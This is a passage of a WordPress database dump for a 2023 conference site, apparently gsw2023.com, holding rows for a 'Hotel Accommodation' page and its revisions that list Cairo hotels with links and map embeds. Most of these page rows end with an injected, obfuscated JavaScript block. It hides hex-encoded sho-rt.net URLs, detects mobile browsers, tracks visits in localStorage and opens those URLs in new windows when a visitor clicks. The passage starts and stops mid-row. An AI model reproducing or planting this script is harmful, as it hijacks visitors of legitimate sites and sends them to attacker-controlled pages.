wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','publish','closed','closed','','hotel-accommodation','','','2023-08-16 18:25:29','2023-08-16 18:25:29','',0,'https://gsw2023.com/?page_id=2685',0,'page','',0),
(2687,1,'2022-10-09 02:54:59','2022-10-09 02:54:59','','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2022-10-09 02:54:59','2022-10-09 02:54:59','',2685,'https://gsw2023.com/?p=2687',0,'revision','',0),
(2688,1,'2022-10-09 02:58:36','2022-10-09 02:58:36','Steigenberger Hotel El Tahrir','Steigenberger Hotel El Tahrir','','inherit','open','closed','','h11','','','2022-10-09 03:13:59','2022-10-09 03:13:59','',2685,'https://gsw2023.com/wp-content/uploads/2022/10/h11.jpg',0,'attachment','image/jpeg',0),
(2689,1,'2022-10-09 02:58:49','2022-10-09 02:58:49','','h12','','inherit','open','closed','','h12','','','2022-10-09 02:58:49','2022-10-09 02:58:49','',2685,'https://gsw2023.com/wp-content/uploads/2022/10/h12.jpg',0,'attachment','image/jpeg',0),
(2690,1,'2022-10-09 02:59:12','2022-10-09 02:59:12','','h13','','inherit','open','closed','','h13','','','2022-10-09 02:59:12','2022-10-09 02:59:12','',2685,'https://gsw2023.com/wp-content/uploads/2022/10/h13.jpg',0,'attachment','image/jpeg',0),
(2691,1,'2022-10-09 03:25:07','2022-10-09 03:25:07','<p>[vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_hoverbox image=\"2688\" primary_title=\" Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" hover_title=\" Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F|title:Hotel%20Accommodation\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe><br />\n[/vc_hoverbox][vc_hoverbox image=\"2689\" primary_title=\"  Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\" Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"] </p>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe><br />\n[/vc_hoverbox][vc_hoverbox image=\"2688\" primary_title=\" Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" hover_title=\" Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F|title:Hotel%20Accommodation\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe><br />\n[/vc_hoverbox][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2022-10-09 03:25:07','2022-10-09 03:25:07','',2685,'https://gsw2023.com/?p=2691',0,'revision','',0),
(2692,1,'2022-10-09 03:31:30','2022-10-09 03:31:30','<p>[vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_hoverbox image=\"2688\" primary_title=\" Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\" Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F|title:Hotel%20Accommodation\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_hoverbox image=\"2689\" primary_title=\"  Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\" Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"] </p>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe><br />\n[/vc_hoverbox][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\"]</p>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<p>  [/vc_hoverbox][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\